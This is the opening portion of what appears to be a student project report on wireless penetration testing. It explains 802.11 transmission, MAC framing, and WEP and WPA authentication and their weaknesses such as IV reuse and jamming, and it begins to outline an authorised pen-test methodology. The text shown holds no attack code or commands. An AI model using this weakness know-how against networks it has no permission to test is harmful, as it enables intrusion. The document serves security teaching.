ii

ABSTRACT

Wireless Penetration testing is a new discipline which is included within the

information security field. This new discipline is an emerging field of study. The huge

adoption of wireless technologies over recent years has placed wireless data networks as

one of the major attack vectors for organizations nowadays. Incident handlers and law

enforcement have been forced to deal with the complexity associated with these

technologies when managing and responding to security incidents. Thus, the need of new

tools for identifying the exploits and vulnerabilities in a wireless environment has

increased in the past few years.

The purpose of this project is to conduct a wireless penetration test, and analyze

the software tools needed to conduct this test in a wireless network. By implementing a

testing methodology, the project is going to address different types of security flaws that

companies face while using wireless networks. Also, some common tests are going to be

discussed. Furthermore, the methodology used by the pen-tester to deploy these tests is

going to be addressed. Finally, after analyzing all the attacks deployed in the wireless

penetration test, security countermeasures will be discussed.

iii

TABLE OF CONTENTS

Abstract ............................................................................................................................... ii

Table of Contents............................................................................................................... iii

List of Figures .................................................................................................................... vi

List of Tables ................................................................................................................... viii

1. Introduction and Background ..................................................................................... 1

1.1 Wireless Local Networks.................................................................................... 4

1.1.1 Wireless Transmission Media..................................................................... 6

1.1.2 Wireless MAC layer ................................................................................... 9

1.1.3 IEEE 802.11 Protocols.............................................................................. 15

1.2 802.11 Security ................................................................................................. 18

1.2.1 Eavesdropping and Interference ............................................................... 18

1.2.2 Wired Equivalent Privacy ......................................................................... 21

1.2.3 Wi-Fi Protected Access............................................................................. 25

1.3 Wireless Penetration Testing ............................................................................ 26

1.3.1 Determining What Others Know .............................................................. 28

1.3.2 Mapping the Network ............................................................................... 29

1.3.3 Scanning the System................................................................................. 29

1.3.4 Performing a Vulnerability Assessment ................................................... 31

1.3.5 Penetrating the System.............................................................................. 31

2. Narrative ................................................................................................................... 40

2.1 Setting Up a Penetration Test Lab .................................................................... 41

iv

2.1.1 Isolating the Pent-test Lab ........................................................................ 41

2.1.2 Securing from Unauthorized Access ........................................................ 43

2.1.3 Managing Storage Devices ....................................................................... 44

2.2 Types of Penetration Test labs.......................................................................... 45

2.2.1 Virtual Pen-Test Lab................................................................................. 45

2.2.2 Internal Pen-Test Lab................................................................................ 46

2.2.3 External Pen-Test Lab............................................................................... 47

2.2.4 Project-Specific Pen-test lab ..................................................................... 48

2.2.5 Ad Hoc Lab............................................................................................... 49

2.3 Pen-Test Lab Description ................................................................................. 49

2.3.1 Hardware Description ............................................................................... 49

2.3.2 Software Description ................................................................................ 52

3. System Research ....................................................................................................... 62

3.1 External Pen-test lab ......................................................................................... 62

3.1.1 Cracking WEP .......................................................................................... 68

3.1.2 Cracking WPA-PSK ................................................................................. 73

3.2 Internal Pen-test lab .......................................................................................... 76

3.2.1 Enumeration Attacks................................................................................. 76

3.2.2 Denial of Service Attacks ......................................................................... 79

4. Evaluation and Results.............................................................................................. 81

4.1 External Pen-test lab ......................................................................................... 82

4.1.1 First Scenario ............................................................................................ 82

4.1.2 Second Scenario........................................................................................ 82

v

4.1.3 Third Scenario........................................................................................... 85

4.2 Internal Pen-Test lab ......................................................................................... 85

4.2.1 Vulnerability Assessment ......................................................................... 85

4.2.2 Denial of Service Attacks ......................................................................... 86

5. Future Work .............................................................................................................. 88

6. Conclusion ................................................................................................................ 90

Bibliography and References............................................................................................ 93

Appendix a – Disc Copy................................................................................................... 98

vi

LIST OF FIGURES

Figure 1.1 802.11 and the OSI Model .........................................................................................................5

Figure 1.2 Spectrum Use by FHSS and DSSS Technologies .....................................................................7

Figure 1.3 FHSS and DSSS interference coping strategies .......................................................................9

Figure 1.4 Four-way Handshake process .................................................................................................11

Figure 1.5 802.11 WLAN data packet structure ......................................................................................12

Figure 1.6 802.11 MAC Headers ................................................................................................................12

Figure 1.7 Wireless Local Area Network Protocols ................................................................................16

Figure 1.8 Secret Key and IV packets .......................................................................................................21

Figure 1.9 Wired Equivalent Privacy process ..........................................................................................22

Figure 1.10 Shared Key Authentication ...................................................................................................24

Figure 2.1 A Sample Internal Pen-test lab ................................................................................................47

Figure 2.2 A Sample External Pen-test Lab..............................................................................................48

Figure 2.3 Backtrack 3.0 Desktop ..............................................................................................................52

Figure 2.4 NetStumbler Main Screen ........................................................................................................54

Figure 2.5 Graphical representation of Signal Strength..........................................................................55

Figure 2.6 The Kismet Interface ................................................................................................................56

Figure 3.1 External Pen-test Lab ...............................................................................................................62

Figure 3.2 Access Point Broadcasting........................................................................................................63

Figure 3.3 Output of Netstumbler..............................................................................................................64

Figure 3.4 Access Point Broadcasting........................................................................................................65

Figure 3.5 Network Details .........................................................................................................................66

Figure 3.6 Airodump-ng Captures Packets...............................................................................................69

Figure 3.7 Aireplay-ng starting to inject packets .....................................................................................71

Figure 3.8 The packet replay’s attack .......................................................................................................72

Figure 3.9 Aircrack-ng displaying the Key ...............................................................................................73

Figure 3.10 shows the process of searching...............................................................................................75

Figure 3.11 Network Layout.......................................................................................................................76

vii

Figure 3.11 Nmap executing .......................................................................................................................77

viii

LIST OF TABLES

Table 1.1 Commonly Hacked Wireless Network Ports ...........................................................................30

Table 2.1 Intel PRO/Wireless 3945 802.11 a/b/g wireless card specifications ........................................50

Table 2.2 Access Point Specifications ........................................................................................................51

Table 2.3 Nmap Options and Scan Types .................................................................................................61

Table 3.1 Nmap Results ..............................................................................................................................77

Table 4.1 Cracking WEP ............................................................................................................................83

1

1. INTRODUCTION AND BACKGROUND

Wireless security requires slightly different thinking from wired security because

it gives potential attackers easy transport medium access. This access significantly

increases the threat that any security architecture must address [Arbaugh 2003]. Wireless

networking broadcast nature makes traditional link-layer attacks readily available to

anyone. Increasingly, companies and individuals are using wireless technology for

important communications they want to keep private, such as mobile e-commerce

transactions, email, and corporate data transmissions. At the same time, as wireless

platforms mature, grow in popularity, and store valuable information, hackers are

stepping up their attacks on these new targets. This is a particular problem because

wireless devices, including smart cellular phones and personal digital assistants (PDAs)

with internet access, were not originally designed with security as a top priority [Miller

2001].

Wireless networks have significantly impacted the world. Through the use of

them, information could be sent easily and quickly without the use of any wire. Wireless

networks provide all the functionality of wired networks without the physical constraints,

and configurations range from simple peer-to-peer to complex networks offering

distributed data connectivity and roaming. They also allow end-user mobility within a

networked environment and enable physical network portability which allows LANs to

move with users that make use of them. Furthermore, wireless networks can be used to

connect to the internet in countries and regions where the telecom infrastructure is poor

[Turnbull 2007].

2

Because of these advantages the use of wireless networks has been increased

dramatically on the past few years, changing not only how computers and electronic

devices interact, but also allowing for mass networking with little reliance on central

infrastructure and spontaneous communications. According to Andrew A. Vladimirov:

“by 2006 the number of shipped wireless networks hardware devices is estimated to

exceed 40 million units” [Vladimirov 2004].

With the prolific deployment of wireless networks in recent times, managing such

type of networks is particularly challenging due to the unreliable and often unprotected

nature of the wireless medium. The trade off for flexibility and mobility is more threats

from hackers using scanner to intercept data or gain access to the wireless network. These

threats are not the common security issues, such as spyware, weak passwords, and

missing patches. This type of networks introduces a new set of vulnerabilities from an

entirely different perspective that either much more difficult or completely impossible to

execute with a standard wired network [Siles 2007].

Wireless networks are more susceptible to attacks by outside forces via Internet

than wired LANs are. This technology has been misused in several ways; such as a

device for extortion and blackmail, as a mean of entry into private networks and systems

and as a means of telecommunication theft. As a result, wireless information security is

an emerging field of study and is becoming increasingly important as a means for

organizations to identify certain information security risks and abnormal network

behavior [Vladimirov 2004].

3

Although there are many methods of security assessment, such as audit trails and

template applications, the only way to truly know how secure a wireless network is by

testing it. “Wireless Penetration testing is the process of attempting to gain access to

resources without knowledge of usernames, passwords and other normal means of

access” [Stephen 2006]. The main objective of penetration testing is to identify all the

exploits and vulnerabilities that exist within an organization’s IT infrastructure and to

confirm the effectiveness of the security measures that have been implemented.

Furthermore, it helps to identify what is the information that is exposed to the public or

the Internet world, giving a bird-eye perspective on current security. More importantly,

penetration testing provides a blueprint for remediation in order to start or enhance a

comprehensive information protection strategy [ISS 2008].

In order to deploy a successfully penetration test, the penetration testing has to be

designed to model real world scenario as closely as possible. Attack scenarios can be

made up to best closely model all possible situations. Thus, the main thing that separates

a penetration tester from an attacker is permission. While most other auditing tends to

touch the surface of security, penetration testing is the most effective method as it is

“proof of concept” that the measures taken to secure the network are not effective

[Stephen 2006].

4

1.1 Wireless Local Networks

As mentioned before Wireless Local Area Networks (WLANs) provide

connectivity between electronic devices without the need for a physical connection. They

transmit and receive data over the air via RF technology combining data connectivity

with user mobility. They enable physical network portability, allowing LANs to move

with users that make use of them. Since WLANs eliminate the physical link to the

network, an office infrastructure may be peripatetic, and free to grow and move to suit

the needs of the organization because the network backbone is no longer hidden behind

walls and floors [Siles 2007].

Although the growth and pervasiveness of wireless appears to be inevitable, the

path and speed of growth of this technology is not so predictable. WLANs are unlikely to

replace traditional wired networks. “Wireless has not yet matured to the point of being

suitable for a data-intensive corporate environment. Also, to say that WLANs are

completely deployed without wires would not be strictly correct. Unless a piece of

equipment is battery-powered, there must be a power cable connection, and a typical

configuration has one or more fixed access points that are connected to a LAN via

traditional data cable” [Nichols 2002].

The access points broadcast to and receive information from wireless clients that

are within the transmission range. The transmission range of an access point varies

depending on the environment, length of the antenna, and the transmission power. In

environments with few obstacles the coverage area for a single access point can reach up

several hundred feet and support a small group of users without introducing noticeable

performance degradation [Turnbull 2007].

5

In its simplest form, a WLAN comprises a single transceiver, called an access

point. Access points, which serve as communication beacons, are connected to a wired

network via an Ethernet cable, and exist at fixed locations throughout the organization.

Network clients with a wireless adapter installed are able to facilitate data transfer from

client to access point. In order to extend a wireless network‘s range, more access points

need to be introduced near the coverage boundaries of previously deployed broadcast

units. Thus, overlapping cells at their perimeters allow clients to maintain a connection at

all times by moving from cell to cell [Zyren 2007].

The IEEE 802.11 is a set of standards for wireless local area network (WLAN)

computer communication, developed by the Institute of Electrical and Electronics

Engineers LAN/MAN Standards Committee in the 5GHz and 2.4 GHz public spectrum

bands. This set of standards is limited in scope to the Physical (PHY) layer and Medium

Access Control (MAC) sub-layer as shown in figure 1.1 [WildPackets 2008].

Figure 1.1 802.11 and the OSI Model [WildPackets 2008]

6

1.1.1 Wireless Transmission Media

Wireless LANs employ radio frequency (RF) and infrared (IR) electromagnetic

airwaves to transfer data from point to point. The 802.11 family of protocols define a

single MAC layer which interacts with three Physical layers [Nichols 2002].

Infrared

Infrared (IR) systems do not make for a practical enterprise WLAN solution and

therefore are not widely employed. IR is able to transfer data by taking advantage of

those frequencies located in close proximity to visible light on the electromagnetic

spectrum. The problem is that these high bands have the same limitations as visible light

in that they cannot penetrate nontransparent objects such as walls, floors, and ceilings. As

a result, WLANs transmitting via IR are restricted to operating within the same room

[Nichols 2002].

Wideband Radio Systems: Spread Spectrum

Originally deployed by the military, Spread spectrum techniques are methods by

which energy generated in a particular bandwidth is deliberately spread in the frequency

domain, resulting in a signal with a wider bandwidth thus, consuming more bandwidth in

exchange for reliability, integrity, and security of communications. These techniques let

devices avoid interference and other signal noise in a way not possible when using the

narrowband radio systems in which data is transmitted and received on a specific

frequency. However, the benefits come with a price. Wideband communications are

noisier and therefore easier to detect [Nichols 2002].

7

Spread spectrum comes in two forms: Frequency-Hopping Spread Spectrum and

Direct-Sequence Spread Spectrum. Of the two, frequency hopping is less costly to

deploy; however, direct-sequence has the potential for more widespread use since, it has

higher data rates, greater range, and a built-in error correction capability. The illustration

in Figure 1.1 of how frequency hopping and direct sequence systems use the spectrum is

more fully explained below [Chinitz 2007].

Figure 1.2 Spectrum Use by FHSS and DSSS Technologies [Chinitz 2007]

Frequency Hopping Spread Spectrum

Frequency Hopping Spread Spectrum (FHSS) is a “the method of transmitting

radio signals by rapidly switching a carrier among many frequency channels, using a

pseudorandom sequence known to both transmitter and receiver” [Chinitz 2007]. FHSS

transmissions can share a frequency band with many types of conventional transmissions

with minimal interference. In Figure 1.2 the FHSS side of the figure shows two different

hopping sequences and how they use different, small slices of the spectrum for short

periods of time.

8

For interference to occur, the conflicting narrowband signal would need to be

broadcast at the same frequency and at the same time as the hopping signal. Whenever

interference occurs, the devices can continue their data transfer by hopping to the next

frequency that is clear. Thus, interference does not break a connection, it makes

throughput to degrade gracefully [Nichols 2002].

Direct Sequence Spread Spectrum

Direct-Sequence Spread Spectrum (DSSS) is a method in which the transmitters

spread the signal over a frequency band that is wider than required to accommodate the

information signal by multiplying the data being transmitted by a pseudorandom

sequence of 1 and -1 value. The inserted bits are referred to as a chip or a chipping code.

By spreading the energy of the original signal into a much wider band, a receiver is able

to perform data recovery routines on signals based on statistical analysis. The ratio of

chips per bit is called the “spreading ratio”. A high spreading ratio increases the

resistance of the signal to interference [Chinitz 2007].

However, Direct-Sequence spread spectrum requires more bandwidth to operate,

generally using three non-overlapping frequencies to communicate. The error-correcting

capability prevents DSSS from needing to retransmit data that may have been corrupted

while en route. Even if one or more bits in the chip are damaged during transmission,

statistical techniques embedded in the ratio can recover the original data. In practice,

DSSS spreading ratios for wireless LANs are quite small. The DSSS portion of Figure

1.3 shows two separate DSSS channels accessing a wide bandwidth in a time static

manner [Chinitz 2007].

9

On the other hand, one of the clear advantages that Frequency Hopping Spread

Spectrum systems have over Direct-Sequence Spread Spectrum systems is their immunity

to interference. While, DSSS products spread their transmission power thinly across the

spectrum, FHSS network hop around the entire 2.4 GHz band. Low levels of interference

can easily overpower the DSSS transmission. Furthermore, Multi-channel DSSS products

use statically allocated pieces of the band. Interference in any significant piece of this

allocated band will interfere with the transmission, possibly destroying it entirely. This is

shown in figure 1.3 [Nichols 2002].

Figure 1.3 FHSS and DSSS interference coping strategies [Chinitz 2007]

1.1.2 Wireless MAC layer

The 802.11 family specifies a common medium access control (MAC) Layer,

which provides a variety of functions that support the operation of 802.11-based wireless

LANs. In general, the MAC Layer is in charge of managing and maintaining

communications between 802.11 stations (radio network cards and access points) by

coordinating access to a shared radio channel and utilizing protocols that enhance

communications over a wireless medium [WildPackets 2008].

10

The 802.11 set of standard defines two different access methods, the distributed

Coordination Function and the Point Coordination Function which simply uses the

Access Point as control system in wireless MAC. PCF has been implemented only in

very few hardware devices [WildPackets 2007].

The Distributed Coordination Function is a Carrier Sense Multiple Access with

Collision Avoidance mechanism (CSMA/CA). In CSMA, the process begins with a

station wishing to transmit first listening to the channel for a predetermined amount of

time so as to check for any activity on the channel. If the channel is sensed “idle” then the

station is permitted to transmit. Whenever the channel is sensed as “busy” the station has

to defer its transmission for a random interval with this the probability of collisions on

the channel are reduced [Nichols 2002].

Under CSMA/CA, devices use a four-way handshake to gain access to the

airwaves to solve the hidden node problem which occurs when two stations that cannot

hear from each other try to send packages to the access point at same time colliding as a

result of not been able to hear from each other. Four-way handshake ensures collision

avoidance by solving this problem [WildPackets 2007].

11

Figure 1.4 Four-way Handshake process [WildPackets 2007]

The Four-way handshake process starts with the source node sending short

Request To Send (RTS) packet addressed to the intended destination. If the intended

destination hears the transmission and is able to receive, it replies with a packet which is

named as short Clear to Send (CTS). Then, the source node sends the data, and the

recipient acknowledges all transmitted packets by returning a short acknowledgment

packet (ACK) for every transmitted packet received [WildPackets 2007].

Packet Structure and Packet Types

The 802.11 family of LAN protocols uses packets as a mean to send information

across the network. 802.11 networks have three basic types of packets: Data,

Management and Control packets. The data packet’s header carries all the functionality

of the protocol. Since RF technology and station mobility impose some complex

requirements on 802.11 WLAN networks. This added complexity is reflected in the long

physical layer convergence protocol (PLCP) headers as well as the data-rich MAC

header. The 802.11 packet structure is shown in figure 1.5 [WildPackets 2007].

12

Figure 1.5 802.11 WLAN data packet structure [WildPackets 2007]

Since 802.11 WLANs must be able to form and re-form their membership

constantly and also radio transmission conditions themselves can change, coordination

becomes a large issue in WLANs. Thus, management and control packets are mainly

dedicated to these condition functions. In addition, the headers of data packets contain

more information about network conditions and topology. Figure 1.6 bellow shows the

802.1 MAC headers [WildPackets 2007].

Figure 1.6 802.11 MAC Headers [WildPackets 2007]

13

In order to explain all the fields and the values that those fields may take in the

data header, a complete breakout of all the steps followed by all the devices trying to

connect and later on transmit information to a WLAN is described bellow. Furthermore, a

list with all the type of information 802.11 WLAN data packets headers convey, and the

types of information carried in management and control packets is addressed bellow.

The first step for a device in joining a BSS or IBSS is authentication. This can be

an open or a shared key system. If WEP encryption of packet data is enabled, shared key

authentication should be used. Authentication is handled by a request/response exchange

of management packets. The fields that are used are [WildPackets 2007]:

• Authentication ID: This is the name under which the current station

authenticated itself on joining the network.

• WEP Enabled: If this field is true, then the payload of the packet (but not the

WLAN headers) will be encrypted using Wired Equivalent Privacy.

The next step for a device joining a BSS or IBSS is to associate itself with the access

point. When roaming, a unit also needs to disassociate and re-associate. All these

functions are handled by an exchange of management packets. The current status is

shown in packet headers. The packet headers has the following fields: [WildPackets

2007]

• Association: A packet can show the current association of the sender. Association

is handled by request/response management packets. Also, disassociation is

handled with management packets and it is a simple declaration from either an

access point or a device.

14

• IBSSID or ESSID: The ID of the group or its access point. A device can only be

associated with one access point (shown by the ESSID) or IBSS at a time.

• Probe: Probes are supported by request/response management packets used by

roaming devices in search of a particular BSS or access point.

The 802.11 WLAN protocol supports rapid adjustment to changing conditions,

always seeking the best throughput. The fields that show this are [WildPackets 2007]:

• Channel: The channel or radio frequency used for the transmission.

• Data rate: The data rate used to transmit the packet.

• Fragmentation: The fragmentation done in 802.11 WLANs is completely

independent of any fragmentation imposed by higher level protocols such as

TCP/IP. This method of fragmentation has the basis of the fact that a series of

short transmissions is less vulnerable to interference in noisy environments. Thus,

fragmentation is dynamically set by the protocol in an effort to reduce the number

of retransmissions.

• Synchronization: The network management packets called “beacon” keep

members of a BSS synchronized.

• Power Save: Because wireless devices need to conserve power, the 8021.11

protocol uses a number of fields in data packets plus the PS-Poll (power save-

poll) control packet to let devices remain connected to the network while in power

save mode.

To ensure transmission of packets and the correct routing of them, the protocol uses

certain header fields and control packets. Those fields and control packets are:

15

• RTS, CTS, ACK: Control packets that are used in the four way handshake in

support of collision avoidance.

• Version: The version of the 802.11 protocol used in constructing the packet.

• Type and Sub-Type: The type of packet with a sub-type specifying its exact

function.

• Duration: A precise value for the time the packet should be allotted for the

reminder of the transaction of which this packet is a part.

• Length: Packet length.

• Retransmission: It is important to declare which packets are retransmissions.

• Sequence: Sequence information in packets helps reduce retransmissions.

• Order: Order of the packets.

• Addresses: There are four address fields in 802.11 WLAN data packets. This is

to accommodate the possibility of forwarding to, from, or through the distribution

system.

• To/From DS: Since traffic can be routed from a device using one access point to

a device using a different access point somewhere along the wired network.

1.1.3 IEEE 802.11 Protocols

According to the IEEE 802.11 set of standards for wireless local area network,

there are several protocols that define this type of networks. The first WLAN standard to

become accepted in the market was 802.11b, followed by 802.11g and 802.11n. Figure

1.7 shows the basic differences among these protocols [WildPackets 2007].

16

Figure 1.7 Wireless Local Area Network Protocols [Broadcom 2006]

802.11a

According to IEEE 802.11a, WLAN networks operate in the frequency band

marked as U-NII (Unlicensed National Information Infrastructure) which represents the

bands 5.15-5.25 GHz and are able to offer 54 Mbit/s as the maximum bit rate. 802.11a

specifies the physical layer for high bit rates, where the OFDM (Orthogonal Frequency

Division Multiplexing system is used as a basis. Since the 2.4 GHz band is heavily used,

using the 5GHz band gives this standard a significant advantage. However, using this

high frequency has the disadvantage of having less effective overall range than that of

802.11b/g. The reason is that 802.11a signals are absorbed more readily by walls and

other solid objects in their path [Zyren 2007].

17

802.11b

The IEEE 802.11b standard is a direct-sequence spread spectrum technology

(DSSS). Wireless data networks using this standard divide the frequency spectrum in

several channels that can be used to establish multiple non-overlapping communications.

802.11b has a maximum raw data of 11 Mbit/s. However, “due to the CSMA/CA

protocol overhead, in practice the maximum 802.11b throughput that an application can

achieve is about 5.9 Mbit/s using TCP and 7.1 Mbit/s using UDP” [Broadcom 2006].

Another problem is that 802.11b devices suffer interference from other products

operating in the 2.4 GHz band. Yet, with all these limitations 802.11b was the most

popular protocol for WLAN [Zyren 2007].

802.11g

In June 2003, the IEEE ratified 802.11g, which applied Orthogonal Frequency-

division multiplexing (OFDM) modulation to the 2.4 GHz band. This combined the best

of both worlds: raw data rates up to 54 Mbps on the same radio frequency as the already

popular 802.11b. Today, the vast majority of computer network hardware shipping

support 802.11g. Increasingly, as technology improves it is becoming easier to support

both 2.4 GHz and 5 GHz in the same chipset [Broadcom 2006].

18

802.11n

Although 802.11n it has not been ratified, the specifications on the 802.11n are

stable enough to Hardware makers start building Wi-Fi cards and routers. This standard

provides for a variety of optional modes and configurations that dictate different

maximum raw data rates. 802.11n improves the OFDM implementation upon the one

employed in the 802.11 a/g standards. This change improves the highest attainable raw

data rate to 65 Mbps [Broadcom 2006].

1.2 802.11 Security

The security of WLANs is very important, especially for applications hosting

valuable information. Since WLAN operates in the same manner as a wired LAN, they

harbor many of the same vulnerabilities as a wired LAN, plus some that are specific to

WLANs. The first threat is the potential for unauthorized parties to eavesdrop on radio

signal sent between a wireless station and an AP, compromising the confidentiality of

private information, the second is the unauthorized access in which an intruder tries to

enter a WLAN system disguised as authorized user. Another threat is interference and

jamming that can seriously degrade bandwidth [Arbaugh 2003].

1.2.1 Eavesdropping and Interference

“Eavesdropping is the act of surreptitiously listening to a private conversation. It

is a passive attack because an eavesdropper can listen to a message without altering the

data” [Kowalski 2006]. The sender and the receiver of the message may not be aware of

the intrusion [Kowalski 2006].

19

Furthermore, with a compatible receiver within the range of the transmission the

intruder can listen to the message, and since radio signals emitted from a WLAN can

propagate beyond the area, in which they originate, penetrate walls depending on the

strength of the signal, the intruder can be far away from the deployed WLAN [Kowalski

2006].

A second threat is the potential for an intruder to enter a WLAN system as an

authorized user without having the right permissions to do so. This attack is considered

an active attack, and can be carried out with a wireless adapter that is compatible with the

targeted network, or by using a compromised device that is linked to the network. A third

threat to WLAN security is radio interference that can seriously degrade bandwidth. In

many cases interference is accidental. Since 802.11b WLANs operates in the 2.4 GHz

radio frequency, other devices such as Bluetooth devices and cordless phone that operate

in the same frequency can overlap with WLAN traffic [Hassell 2004].

Of course, interference may also be intentional. An attacker with a powerful

transmitter can generate a radio signal stronger than the WLAN signals disrupting

communications. This is a condition known as jamming and is a denial-of-service attack.

Jamming equipment is readily available to consumers or can be constructed by

knowledgeable attackers. In addition, this type of attack can be done from a remote

location far from the targeted network [Bellardo 2003].

20

Although these threats can put in serious danger the security of a WLAN, there

are some countermeasures to lessen these threats. According to the IEEE 802.11 standard

WLANs use Spread-Spectrum technology to transmit data. As mentioned before Spread

Spectrum technology is designed to resist eavesdropping, interference and noise. Direct-

Sequence Spread Spectrum, which is the technique most commonly used, the

eavesdropper, must know the chipping code or code words (802.11b) [Vladimirov 2004].

Furthermore, the eavesdropper must also know the frequency band and

modulation techniques in order to accurately read the transmitted signal. Adding to an

eavesdropper’s difficulties is the fact that Spread-Spectrum technologies do not

interoperate with each other which means that a WLAN using FHSS cannot communicate

with WLAN using DSSS, and vice versa. Even if two different systems are using the

same technique, they cannot communicate if they are using different frequency bands. On

the other hand, Spread-Spectrum technology is only secure if the hopping pattern or

chipping code is unknown to the eavesdropper; however, these parameters are of public

knowledge because they are published in the 802.11 standard. Also, the modulation

method is specified. Using this information, a knowledgeable eavesdropper could build a

receiver to intercept and read unprotected signals [Chinitz 2007].

A solution to prevent third parties from compromising transmitted data is to use

encryption. Wired Equivalent Privacy (WEP) was the first encryption standard available

for wireless networks. The purpose of WEP is to ensure that WLAN systems have a

level of privacy that is equivalent to that of wired LANs by encrypting radio signals. A

secondary purpose of WEP is to prevent unauthorized users from accessing WLANs by

providing a method of authorization [Arbaugh-Shankar 2001].

21

1.2.2 Wired Equivalent Privacy

Wired Equivalent Privacy (WEP) uses a secret key that is shared between a

wireless station and an access point (AP). All data sent and received between a wireless

station and an AP are encrypted using this secret key. The 802.11 standard does not

specify how the secret key is established. However, it does allow for an array that

associates a unique key with each device. In most cases, however, one key is shared

among all stations and APs in a given system [Nichols 2002].

“WEP provides data encryption using a 40-bit or 128-bit secret key and uses the

stream cipher RC4 (Pseudo Random Number Generator) for confidentiality and the CRC-

32 checksum for integrity. Indeed, two processes are applied to plaintext data: one

encrypts the plaintext, and the other protects it from unauthorized modification while it is

in transit” [Nichols 2002]. The process starts with a secret key being concatenated with a

random initialization vector (IV) that adds 24 bits to the resulting key. Figure 1.8 shows

that the secret key (40 or 104 bit) and IV (always 24 bit) combined are used to encrypt

the data packets and checksum (CRC) [Tamini 2006].

Figure 1.8 Secret Key and IV packets [Tamini 2006]

22

This key is inserted into the RC4 cipher (PRNG) that generates a long pseudo-

random key stream. The sender uses the XOR operation to XORs the key stream with the

plaintext to generate encrypted text, or cipher text, and transmits it to the receiver along

with the IV. The receiver uses the IV and its own copy of the secret key to produce the

same key stream than the transmitter. Finally, the receiver XORs the key stream with the

cipher text to reveal the original plain text [Nichols 2002].

In order to protect the cipher text against unauthorized modification while in

transit, Wired Equivalent Privacy (WEP) applies an integrity check algorithm (CRC-32)

to the plain text. This second process will produce an Integrity Check Value (ICV). Then

it is concatenated to the plain text. The ICV is attached to the cipher text and sent to the

receiver along with the IV. The receiver compares the output ICV, which is the result of

applying the integrity algorithm to the plain text, to the transmitted ICV. If the two ICVs

match, the message is authenticated. Figure 1.9 illustrates WEP encryption and

decryption, respectively [Nichols 2002].

Figure 1.9 Wired Equivalent Privacy process [Tamini 2006]

23

Despite the potential strength of WEP for protecting the confidentiality and

integrity of data, it has limitations and flaws that can only be partially addressed by

proper management. The first problem stems from the reuse of Initialization Vector (IV).

The IV is included in the unencrypted part of the message so the receiver knows what IV

to use when generating the key stream for decryption. If the same IV is reused for

subsequent messages, an eavesdropper may be able to crypt-analyze the key stream

generated by the IV and secret key and thus decrypt messages that use that IV [Tamini

2006].

Reusing the IV potentially leads to another problem. Once, an attacker knows the

key sequence for an encrypted message, he can use this information to create a new

message. The attacker can transmit the message to the AP or wireless station, which

would accept it as a valid message. The 802.11 standard recommends changing the IV

after each transmission which can prevent both problems. However, since it is not

required, not many change frequently enough the value of the IV [Tamini 2006].

Although it is not a security issue, WEP encryption can reduce bandwidth in use.

The 40-bit encryption reduces bandwidth by 1 Mbps, and 128-bit encryption reduces

bandwidth by 1 to 2 Mbps. This degree of drop is relatively small, but users still notice it,

especially if the signal is transmitted via FHSS, which transmit signals at a maximum of

only 3 Mbps [Arbaugh 2003].

24

WEP also provides means to authenticate users trying to connect to an access

point. Basically, it has two types of authentication: “a default Open System, whereby all

users are permitted to access a WLAN, and shared key authentication, which controls

access to the WLAN and prevents unauthorized network access” [Nichols 2002]. Of the

two levels, shared key authentication is the secure mode. It works by sharing a secret key

among all stations and Access Points in a WLAN system. When a station tries to

associate with an AP, the AP replies back with random text by way of a challenge. The

station must use its copy of the shared secret key to encrypt the challenge text and send it

back to the AP in order to authenticate itself. The AP decrypts the response using the

same shared key and compares it to the challenge text sent earlier. If the text is identical,

the AP sends a confirmation message to the station and accepts the station into the

network. Figure 1.10 shows the shared key authentication process [Cam-Winget 2003].

Figure 1.10 Shared Key Authentication [WildPackets 2007]

25

Shared Key authentication works only if WEP encryption is enabled. If it is not

enabled, the system will default to the Open System mode, permitting almost any station

within range of an AP to access the network. The problem with this method of

authentication is the distribution of the key. Most WLANs share one key among all

devices and Access Points in the network. It is improbably that a key shared among many

users will remain secret indefinitely. A partial solution to this problem is to configure

wireless stations with a secret key themselves, rather than permitting end users to perform

this task. The problem of this solution is that still the shared key is stored on the users’

computers where it is vulnerable [Walker 2000].

In addition, if a key on even one station is compromised, all the other stations in

the system must be reconfigured with a new key. A better solution is to assign a unique

key to each station and to change them frequently. Furthermore, in many WLAN

systems, the key used for authentication is the same key used for encryption creating a

dual threat. The solution is to distribute separate keys throughout the system-one for

authentication and another for encryption [Walker 2000].

1.2.3 Wi-Fi Protected Access

Because of Wired Equivalency Protocol (WEP) has been found to be highly

flawed, to the serious detriment of its security claims and supporters, the Wi-Fi Alliance

industry group that promotes interoperability and security for the wireless LAN industry

created the Wi-Fi Protected Access (WPA) standard which was intended to replace WEP.

In addition, the IEEE 802.11i standard incorporates the WPA encryption method [Cam-

Winget 2003].

26

WPA allows for two kinds of security authentication types, WPA-802.1x (AKA

WPA-Enterprise) and WPA-PSK or (WPA-home). The first one uses a Remote

Authentication Dial-in User Service (RADIUS) server on the network. A RADIUS server

“is a certificate authenticator that only allows client stations to connect with the Access

Point (AP) if it sees a valid certificate on the client, which the server provided earlier”

[Housley 2003]. This use of WPA is generally for medium to large business, and is

generally not used in small office/home office (SOHO) environments [Housley 2003].

For SOHO environments WPA-PSK is a better choice. It uses a pass-phrase,

which is between 8 and 63 characters long. This pass-phrase is created and entered by the

user into any client station’s configuration utility, as well as into the AP. The way to

authenticate a user is through the Extensible Authentication Protocol (EAP). This

process leaves two considerations: the access point still needs to authenticate itself to the

client, and keys to encrypt the traffic need to be derived [Housley 2003].

1.3 Wireless Penetration Testing

As mentioned before, a penetration test offers an invaluable and compelling way

to establish a baseline assessment of security as seen from outside the boundaries the

organization’s network. If executed properly penetration tests provide evidence that

vulnerabilities do exist and that network penetrations are possible. More importantly,

they provide a blueprint for remediation in order to start or enhance a comprehensive

information protection strategy [INSIGHT 2008].

27

Penetration tests require certain key elements to be in place in order to ensure

useful, timely results. First, they must cover the full range of the threat spectrum, from

the presence of an antivirus engine to the more sophisticated vulnerabilities that might

enable denial of service attacks. Also, they must deliver clear, unambiguous results that

address both the technical and business objectives of the client. There exist

methodologies that the consultants need to follow. Furthermore, the most up-to-date

software should be used with the goal to gain maximum results with minimal disruption

to normal business operations [Beaver 2005].

The first step to deploy a penetration test is planning. There has to be a well

defined and ordered plan before start testing the wireless network for security

vulnerabilities. It is critical to plan everything in advance. This includes [Beaver 2005]:

• Permission to perform the tests from the boss, project sponsor, or client.

• Testing goals.

• Tests to run.

Ethical hacking is more than just running a wireless-network analyzer and scanning

for open ports. There are some formal procedures that should be incorporated into the

testing plan [Beaver 2005]. A well thought professional attack against a wireless network

is likely to flow in the following sequence [Vladimirov 2004]:

1. Enumerating the network and its coverage area via the information available

online and from personal contact and social engineering resources.

2. Planning the site survey methodology and attacks necessary to deploy against the

network.

28

